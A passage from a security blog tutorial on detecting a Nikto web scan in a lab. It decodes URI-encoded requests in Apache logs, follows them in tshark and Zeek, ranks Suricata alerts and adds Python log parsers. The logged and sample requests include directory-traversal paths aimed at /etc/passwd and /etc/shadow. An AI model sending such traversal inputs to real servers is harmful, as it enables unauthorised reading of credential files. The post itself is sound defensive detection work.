<span style="color: white;">/%64a%6ea%2d%6e%61%2f../d%61n%61%2f%68%74%6dl%35a%63%63%2fg%75%61%63a%6d%6fle/%2e%2e/%2e%2e/%2e./.%2e%2f%2e%2e%2f%2e%2e%2fe%74c/%70%61s%73w%64?/d%61na/ht%6dl%35acc/gua%63amo%6ce/</span><span style="font-family: Times New Roman;"><span style="white-space: normal;"><i>
</i></span></span></pre></div><i>
</i><p></p><p>As before, this has to be decoded. Let's build on that output, by leveraging <i>awk</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat error.log | grep --perl-regexp '10.0.0.108' | grep "core:error" | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">grep --perl-regexp '\s+\(.*?\)' --only-matching | cut --fields 2 --delimiter "(" | cut --fields=1 --delimiter=')' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">awk --field-separator='$' '{ system("urlencode -d " $1) }'</span>
<span style="color: white;">/../../../../../../../../../../../../etc/shadow</span>
<span style="color: white;">/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
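<p>The percent-decoding done above with <i>urlencode -d</i> and the status-code tallying done with <i>awk</i>/<i>cut</i>/<i>sort</i>, reimplemented as one added Python parser (example code, not the post's own one-liners and not Nikto's code). The sample log lines are constructed from the <i>access.log</i> excerpts in this post, with a shortened user agent and a made-up traversal line; decoding every path before grouping is what lets a defender see that differently encoded requests are the same probe.</p>

```python
"""Normalise percent-encoded request paths in an Apache access.log.

Added example for this post; not Nikto's code and not the post's own
one-liners. Nikto's evasion type 1, "Random URI encoding (non-UTF8)",
percent-encodes a random subset of characters in each request path, so the
same probe shows up in the log under many spellings. Decoding before
counting lets a defender group the probes, and a real log-line parser avoids
depending on the literal "1.1" appearing somewhere in the line.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Apache "combined" log format. The request line is captured whole and split
# afterwards, because a malformed request (e.g. "GET %2f HTTP/1.1", which
# Apache answers with 400) still has to be parsed.
ACCESS_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample, modelled on the access.log excerpts in this post (the
# user agent is shortened and the traversal line is made up for illustration).
SAMPLE_LOG = """\
10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET %2f HTTP/1.1" 400 326 "-" "-"
10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET /%63g%69%2e%63%67%69%2f HTTP/1.1" 404 297 "-" "Mozilla/5.0"
10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET /cgi%2ecgi/ HTTP/1.1" 404 297 "-" "Mozilla/5.0"
10.0.0.108 - - [31/May/2023:09:17:21 -0400] "GET /%2e%2e/..%2f%2e%2e%2fetc/%70asswd HTTP/1.1" 400 326 "-" "Mozilla/5.0"
10.0.0.108 - - [31/May/2023:09:17:21 -0400] "PUT /n%69kt%6f%2d%74e%73%74-%73Naj%52%56%44%64%2eh%74%6dl HTTP/1.1" 405 321 "-" "Mozilla/5.0"
10.0.0.108 - - [31/May/2023:09:17:22 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/5.0"
10.0.0.108 - - [31/May/2023:09:17:22 -0400] "TRACE / HTTP/1.1" 200 210 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    match = ACCESS_RE.match(line.rstrip("\r\n"))
    if match is None:
        return None
    rec = match.groupdict()
    # Request line is normally "METHOD PATH HTTP/x.y"; tolerate shorter forms.
    parts = rec["request"].split(" ")
    rec["method"] = parts[0]
    rec["path"] = parts[1] if len(parts) > 1 else ""
    rec["status"] = int(rec["status"])
    return rec


def decode_path(path):
    """Percent-decode a path the way `urlencode -d` did in the post.

    errors="replace" keeps going on byte sequences that are not valid UTF-8
    (the evasion mode is explicitly "non-UTF8") instead of raising.
    """
    return unquote(path, encoding="utf-8", errors="replace")


def status_summary(lines):
    """Count status codes, most frequent first (the sort | uniq --count pipeline)."""
    counts = Counter(rec["status"] for rec in map(parse_line, lines) if rec)
    return counts.most_common()


def group_by_decoded_path(lines):
    """Map each decoded path to the set of raw spellings seen for it in the log."""
    groups = {}
    for rec in map(parse_line, lines):
        if rec and rec["path"]:
            groups.setdefault(decode_path(rec["path"]), set()).add(rec["path"])
    return groups


def requests_with_status(lines, status):
    """Return (method, decoded path) pairs for requests that got the given status code."""
    return [(rec["method"], decode_path(rec["path"]))
            for rec in map(parse_line, lines) if rec and rec["status"] == status]


def traversal_attempts(lines):
    """Decoded paths containing '../', which the encoding hides from a naive grep."""
    return [path for path in group_by_decoded_path(lines) if "../" in path]


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for status, count in status_summary(lines):
        print(f"{count:>5} {status}")
    for decoded, raw in group_by_decoded_path(lines).items():
        print(decoded, "<-", sorted(raw))
    print("successful:", requests_with_status(lines, 200))
    print("traversal:", traversal_attempts(lines))
```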
<p></p><p>Awesome, we were able to decode via a one-liner. The output above shows a <i>directory traversal attack</i> looking for <i>/etc/shadow</i> and <i>/etc/passwd</i>. We know these are false positives because the web server is running on Windows. Hence there is nothing for us to analyze here.</p><p>Transitioning to packet analysis.</p><p><b><span style="font-size: medium;">Detect - Packet Analysis</span></b></p><div>Setup for packet analysis: capture packets on ports 80 or 443.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ tshark -n -w tuning_2.pcap -f 'tcp port(80 or 443)' --interface eth0</span>
</pre></div>
</div><div><br /></div><div>We know from the log analysis, there were 2 <i>200</i> messages and 1 <i>405</i>. Let's start with the <i>405</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ tshark -n -r tuning_2.pcap -Y 'http.response.code == 405' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport -e tcp.stream -E header=y</span>
<span style="color: white;">ip.src ip.dst tcp.srcport tcp.dstport tcp.stream</span>
<span style="color: white;">10.0.0.106 10.0.0.108 80 43566 11</span>
</pre></div>
</div><div><br /></div><div><div>Digging deeper into this stream, we see the full details of the request and the response.</div></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span>└─$ tshark -n -r tuning_2.pcap -q -z follow,tcp,ascii,10.0.0.106:80,10.0.0.108:43566 | grep 405 --before-context=10 --after-context=7</span>
<span>332</span>
<span style="font-weight: bold;">PUT</span> <span>/n%69kt%6f%2d%74e%73%74-%73Naj%52%56%44%64%2eh%74%6dl</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Content-Type</span><span>:</span> <span>application/x-www-form-urlencoded</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">Content-Length</span><span>:</span> <span>22</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
This was a Nikto test.
608
HTTP/1.1 405 Method Not Allowed
Date: Wed, 31 May 2023 13:17:21 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Allow: POST,OPTIONS,HEAD,GET,TRACE
Content-Length: 321
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for this URL.</p>
<hr>
<address>Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Server at 10.0.0.106 Port 80</address>
</body></html></span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
</div><p>Interestingly, while the <i>PUT</i> method was not allowed, the response above shows the server allows "<i>POST,OPTIONS,HEAD,GET,TRACE</i>". Moving on, nothing else to see with this method.</p><p>Looking at the two records where the response code is <i>200</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ tshark -n -r tuning_2.pcap -Y 'http.response.code == 200' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport -e tcp.stream -E header=y</span>
<span style="color: white;">ip.src ip.dst tcp.srcport tcp.dstport tcp.stream</span>
<span style="color: white;">10.0.0.106 10.0.0.108 80 46274 312</span>
<span style="color: white;">10.0.0.106 10.0.0.108 80 46314 315</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Looking at stream <i>312</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span>└─$ tshark -n -r tuning_2.pcap -q -z follow,tcp,ascii,10.0.0.106:80,10.0.0.108:46274 | grep 200 --before-context=8 --after-context=7</span>
<span>193</span>
<span style="font-weight: bold;">OPTIONS</span> <span>*</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
187
HTTP/1.1 200 OK
Date: Wed, 31 May 2023 13:17:22 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Nothing exciting there. Nothing exciting for the <i>TRACE</i> either. </p><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span>└─$ tshark -n -r tuning_2.pcap -q -z follow,tcp,ascii,10.0.0.106:80,10.0.0.108:46314 | grep 200 --before-context=8 --after-context=7 </span>
<span style="font-weight: bold;">TRACE</span> <span>/</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">Trace-Test</span><span>:</span> <span>Nikto</span>
446
HTTP/1.1 200 OK
Date: Wed, 31 May 2023 13:17:22 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: message/http</span>
</pre></div>
</div><div><br /></div><p>Nothing much more to do here via packet analysis. There is a lot in the packets, but in this scenario, what is the real benefit of looking at <i>4xx</i> and <i>5xx</i> errors? If you have a different opinion on the 4xx codes, feel free to share your opinion in the chat.</p><div><b><span style="font-size: medium;">Detect - Zeek Analysis</span></b></div><div><br /></div><div>Set up Zeek:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ sudo zeek --iface any --no-checksums</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
</div><p>Let's see what <i>Zeek</i> can tell us, focusing primarily on the requests which were successful:</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat http.log | grep --perl-regexp '\s+200\s+' | cut --fields 1 --delimiter='-' </span>
<span style="color: white;">1685539068.778266 CfTqVex3giFVuZHr1 10.0.0.108 46274 10.0.0.106 80 2 OPTIONS 10.0.0.106 *</span>
<span style="color: white;">1685539068.802076 CeV6D319VtYt5qKZHf 10.0.0.108 46314 10.0.0.106 80 1 TRACE 10.0.0.106 /</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Let's take the UID "CfTqVex3giFVuZHr1" to see where else there is associated activity. </p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ grep "CfTqVex3giFVuZHr1" *.log | cut --fields=1 --delimiter=':' | sort --unique </span>
<span style="color: white;">conn.log</span>
<span style="color: white;">files.log</span>
<span style="color: white;">http.log</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>So far, we've worked with the <i>http.log</i>, so there is no surprise that the <i>conn.log</i> file also shows up there. What's in the <i>files.log</i>. Let's go hunting there.</p><p>The <i>files.log</i> did not return anything meaningful.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2] </span>
<span style="color: white;">└─$ grep "CfTqVex3giFVuZHr1" files.log </span>
<span style="color: white;">1685539068.776983 F4eJjh2lgpWOQmofe CfTqVex3giFVuZHr1 10.0.0.108 46274 10.0.0.106 80 HTTP 0 (empty) text/html - 0.000000 - F 297 297 0 0 F - - - - - - -</span>
<span style="color: white;">1685539068.790150 Fx2Mtn4wvdujHy9u29 CfTqVex3giFVuZHr1 10.0.0.108 46274 10.0.0.106 80 HTTP 0 (empty) text/html - 0.000000 - F 326 326 0 0 F - - - - - - -</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
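<p>The pivot above (filter <i>http.log</i> on status 200, take the UID, grep every log for it) is the bread-and-butter Zeek workflow. As an added example, not code from the original post, here is the same thing done by actually parsing the Zeek TSV headers rather than grepping raw text, so a UID is only matched in a UID column. The three log excerpts are constructed with reduced <i>#fields</i> headers (a real Zeek log declares more columns; the parser keys records by whatever the header declares, so it runs unchanged on full logs). The UIDs <i>CfTqVex3giFVuZHr1</i> and <i>CeV6D319VtYt5qKZHf</i> and the two file IDs are the ones from the post; the third UID, the PUT record and the conn.log rows are made up.</p>

```python
"""Pivot across Zeek TSV logs by connection UID.

Added example, not code from the original post. The log excerpts below
are constructed with reduced #fields headers; the parser keys each record
by whatever #fields declares, so it works on full logs unchanged."""
from collections import defaultdict


def parse_zeek_tsv(text):
    """Yield one dict per data row, keyed by the names in the #fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue  # other header lines: #separator, #types, #close ...
        else:
            if fields is None:
                raise ValueError("data row before #fields header")
            yield dict(zip(fields, line.split("\t")))


def successful_http(http_log):
    """Records with status_code 200, the typed equivalent of grep '\\s+200\\s+'."""
    return [r for r in parse_zeek_tsv(http_log) if r.get("status_code") == "200"]


def pivot_uid(uid, logs):
    """Return {log name: [records]} for every record that references uid.

    conn.log, http.log and (Zeek 6+) files.log carry the UID in 'uid';
    older files.log wrote the connection UIDs into the 'conn_uids' set,
    which TSV renders comma-separated, so that column is checked too."""
    hits = defaultdict(list)
    for name, text in logs.items():
        for rec in parse_zeek_tsv(text):
            if rec.get("uid") == uid or uid in rec.get("conn_uids", "").split(","):
                hits[name].append(rec)
    return dict(hits)


def tsv(*cols):
    return "\t".join(cols)


# Constructed excerpts (reduced columns); the third UID is a made-up placeholder.
HTTP_LOG = "\n".join([
    "#separator \\x09",
    tsv("#fields", "ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p",
        "method", "host", "uri", "status_code"),
    tsv("1685539068.778266", "CfTqVex3giFVuZHr1", "10.0.0.108", "46274",
        "10.0.0.106", "80", "OPTIONS", "10.0.0.106", "*", "200"),
    tsv("1685539068.802076", "CeV6D319VtYt5qKZHf", "10.0.0.108", "46314",
        "10.0.0.106", "80", "TRACE", "10.0.0.106", "/", "200"),
    tsv("1685539068.810000", "CmadeUp0000000001", "10.0.0.108", "46320",
        "10.0.0.106", "80", "PUT", "10.0.0.106", "/nikto-test.html", "405"),
])
CONN_LOG = "\n".join([
    tsv("#fields", "ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p",
        "proto", "service"),
    tsv("1685539068.770000", "CfTqVex3giFVuZHr1", "10.0.0.108", "46274",
        "10.0.0.106", "80", "tcp", "http"),
    tsv("1685539068.800000", "CeV6D319VtYt5qKZHf", "10.0.0.108", "46314",
        "10.0.0.106", "80", "tcp", "http"),
])
FILES_LOG = "\n".join([
    tsv("#fields", "ts", "fuid", "uid", "id.orig_h", "id.orig_p", "id.resp_h",
        "id.resp_p", "source", "mime_type", "total_bytes"),
    tsv("1685539068.776983", "F4eJjh2lgpWOQmofe", "CfTqVex3giFVuZHr1", "10.0.0.108",
        "46274", "10.0.0.106", "80", "HTTP", "text/html", "297"),
    tsv("1685539068.790150", "Fx2Mtn4wvdujHy9u29", "CfTqVex3giFVuZHr1", "10.0.0.108",
        "46274", "10.0.0.106", "80", "HTTP", "text/html", "326"),
])
LOGS = {"conn.log": CONN_LOG, "files.log": FILES_LOG, "http.log": HTTP_LOG}

if __name__ == "__main__":
    for rec in successful_http(HTTP_LOG):
        print("200:", rec["uid"], rec["method"], rec["uri"])
        for log, rows in pivot_uid(rec["uid"], LOGS).items():
            print("  seen in", log, "x", len(rows))
```

<p>On a real Zeek output directory you would read each <i>*.log</i> file into the <i>LOGS</i> dict and let the header drive the column names; the pivot then works the same for <i>ssl.log</i>, <i>dns.log</i> or any other log that carries a <i>uid</i> column.</p>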
<p></p><p>Moving on to IDS analysis</p><p><b><span style="font-size: medium;">Detect - Suricata (IDS) Analysis</span></b></p><p>Setup Suricata to operate in IDS mode</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l . --simulate-ips -k all</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Taking a look at the alerts triggered for this activity. We see there were 37 alerts triggered.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | wc --lines </span>
<span style="color: white;">37</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Peeking into the top 5 alerts that triggered the most.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_2]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5</span>
<span style="color: white;"> 122 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt </span>
<span style="color: white;"> 8 1:2101402:9] GPL EXPLOIT iissamples access </span>
<span style="color: white;"> 7 1:2100977:15] GPL EXPLOIT .cnf access </span>
<span style="color: white;"> 5 1:2101245:13] GPL EXPLOIT ISAPI .idq access </span>
<span style="color: white;"> 4 1:2101129:9] GPL WEB_SERVER .htaccess acces</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
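<p>The <i>cut --fields=3 --delimiter='['</i> trick above works because of where the brackets fall in a <i>fast.log</i> line, but it also drops the source and destination, which is the next thing a SOC wants to pivot on. As an added example, not code from the original post, here is a parser for the <i>fast.log</i> line format that keeps every field, ranks signatures the way the <i>sort | uniq --count | sort --numeric-sort --reverse</i> pipeline does, and counts alerts per source address. The sample lines are constructed: the signature IDs and messages are the ones from the output above, while the timestamps, ports, classifications and the deliberately malformed last line are made up.</p>

```python
"""Parse Suricata fast.log and rank alerts.

Added example, not code from the original post. SAMPLE_FAST_LOG is
constructed: signature IDs and messages come from the post's output,
the timestamps, ports and classifications are made up."""
import re
from collections import Counter

# One fast.log line:
# <ts>  [**] [gid:sid:rev] <msg> [**] [Classification: ...] [Priority: n] {proto} src:port -> dst:port
# The Classification bracket is absent for rules without a classtype. IPv4 only here.
FAST_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.*?)\s+\[\*\*\]"
    r"(?:\s+\[Classification:\s*(?P<cls>[^\]]*)\])?"
    r"\s+\[Priority:\s*(?P<prio>\d+)\]\s+\{(?P<proto>[^}]+)\}\s+"
    r"(?P<src>\S+):(?P<sport>\d+)\s+->\s+(?P<dst>\S+):(?P<dport>\d+)$"
)


def parse_fast_log(text):
    """Return (alerts, skipped): one dict per matching line, plus the count of lines that did not parse."""
    alerts, skipped = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        m = FAST_RE.match(line)
        if m:
            alerts.append(m.groupdict())
        else:
            skipped += 1
    return alerts, skipped


def signature_counts(alerts):
    """((sid, msg), count) pairs ordered like 'sort | uniq -c | sort -nr'."""
    return Counter((a["sid"], a["msg"]) for a in alerts).most_common()


def top_signatures(alerts, n=5):
    """The 'head --lines=5' view from the post."""
    return signature_counts(alerts)[:n]


def source_counts(alerts):
    """Alerts per source address, the pivot the cut-based pipeline throws away."""
    return Counter(a["src"] for a in alerts).most_common()


# Constructed sample lines (see module docstring); the last line is deliberately not an alert.
SAMPLE_FAST_LOG = """\
05/31/2023-13:17:22.102311  [**] [1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.108:46274 -> 10.0.0.106:80
05/31/2023-13:17:22.104870  [**] [1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.108:46276 -> 10.0.0.106:80
05/31/2023-13:17:22.110442  [**] [1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.108:46278 -> 10.0.0.106:80
05/31/2023-13:17:22.120001  [**] [1:2101402:9] GPL EXPLOIT iissamples access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 10.0.0.108:46280 -> 10.0.0.106:80
05/31/2023-13:17:22.130555  [**] [1:2101402:9] GPL EXPLOIT iissamples access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 10.0.0.108:46282 -> 10.0.0.106:80
05/31/2023-13:17:22.140777  [**] [1:2101129:9] GPL WEB_SERVER .htaccess access [**] [Priority: 2] {TCP} 10.0.0.108:46284 -> 10.0.0.106:80
this line is not an alert and is counted as skipped
"""

if __name__ == "__main__":
    alerts, skipped = parse_fast_log(SAMPLE_FAST_LOG)
    print(f"{len(alerts)} alerts, {len(signature_counts(alerts))} distinct signatures, {skipped} skipped")
    for (sid, msg), n in top_signatures(alerts):
        print(f"{n:>5}  {sid}  {msg}")
    print("by source:", source_counts(alerts))
```

<p>Counting <i>skipped</i> lines matters on a real box: a non-zero value usually means the log was rotated mid-read or the output format was changed in <i>suricata.yaml</i>, not that the scan stopped.</p>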
<p></p><p>Nothing more to do here.<br /><br /></p><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div><div><br /></div></div><p>References:</p><p><a href="https://www.urldecoder.net/linux-urldecode" target="_blank">https://www.urldecoder.net/linux-urldecode</a><br /><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Status" target="_blank">https://developer.mozilla.org/en-US/docs/Web/HTTP/Status</a><br 
